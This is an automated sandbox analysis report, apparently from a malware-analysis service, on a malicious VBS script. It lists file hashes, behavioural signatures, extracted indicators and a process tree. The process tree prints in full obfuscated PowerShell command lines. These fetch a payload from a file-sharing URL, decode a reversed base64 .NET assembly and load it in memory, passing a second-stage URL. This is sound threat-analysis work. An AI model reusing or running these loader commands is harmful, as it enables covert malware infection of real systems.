Resubmissions
07-11-2024 16:02  241107-tg9hhavgnl  10
07-11-2024 15:49  241107-s9mzjavfng  10
07-11-2024 11:30  241107-nl46pa1jdz  10

Analysis
max time kernel: 119s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 07-11-2024 15:49
Static task: static1

Behavioral task: behavioral1
  Sample: dfcugh.vbs
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: dfcugh.vbs
  Resource: win10v2004-20241007-en
General
Target: dfcugh.vbs
Size: 13KB
MD5: 4f3e6d1619f31390de9a461391f10dba
SHA1: 9d90fa6b3bb7809fc800751c6cfc41dc68742a84
SHA256: 2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6
SHA512: f609e24d91a9ee08fe9b89f4909eb8745045d67b0b20d187d4586f5c382cefc2af96baacd1125aef96b71cc4eeeefdf0baa4467a1bb66637edfedacca9615427
SSDEEP: 384:CiQvc9iQZ4T6+wi7Ahrd5RxEA/mywQfD6U512ChMsB+5wZ/f3CPR:CiQk9iQzn512ChMsB+4/fyPR
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures

Blocklisted process makes network request (4 IoCs)
Processes: WScript.exe, powershell.exe
  flow  pid   Process
  3     3000  WScript.exe
  4     3000  WScript.exe
  8     2656  powershell.exe
  9     2656  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
Processes: powershell.exe, powershell.exe
  pid   Process
  2092  powershell.exe
  2656  powershell.exe

Command and Scripting Interpreter: JavaScript (1 TTPs)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
  description             flow  ioc
  HTTP User-Agent header  3     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  4     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: powershell.exe, powershell.exe
  pid   Process
  2092  powershell.exe
  2656  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: powershell.exe, powershell.exe
  description              pid   Process
  Token: SeDebugPrivilege  2092  powershell.exe
  Token: SeDebugPrivilege  2656  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
Processes: WScript.exe, WScript.exe, powershell.exe
  description                       pid   Process         procid_target
  PID 2948 wrote to memory of 3000  2948  WScript.exe     31
  PID 2948 wrote to memory of 3000  2948  WScript.exe     31
  PID 2948 wrote to memory of 3000  2948  WScript.exe     31
  PID 3000 wrote to memory of 2092  3000  WScript.exe     32
  PID 3000 wrote to memory of 2092  3000  WScript.exe     32
  PID 3000 wrote to memory of 2092  3000  WScript.exe     32
  PID 2092 wrote to memory of 2656  2092  powershell.exe  34
  PID 2092 wrote to memory of 2656  2092  powershell.exe  34
  PID 2092 wrote to memory of 2656  2092  powershell.exe  34
Processes

1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"
   PID: 2948
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"
      PID: 3000
      - Blocklisted process makes network request
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
         PID: 2092
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"
            PID: 2656
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 3d68e0db63d092d83baf5f2e61a2240c
SHA1: 54bec790443c5eceea3819b516714d8d73588684
SHA256: 718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a
SHA512: 115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: be3963bae63b053554c811e1f84d207d
SHA1: ad885f0f42df6fa352478104966b33b0e8621862
SHA256: 203e0b24258ad6ccaca72b291abf9d61dbb86267546ef7ab022ba1b8f0a12410
SHA512: bf9fe2d0b330f0b94afac97721248b6b30d51ca3468afaa8cc9dd5955465eeff9d3f38e9518a0719d750275f30310a2add17ed5c165e2f41a388d30471cbee04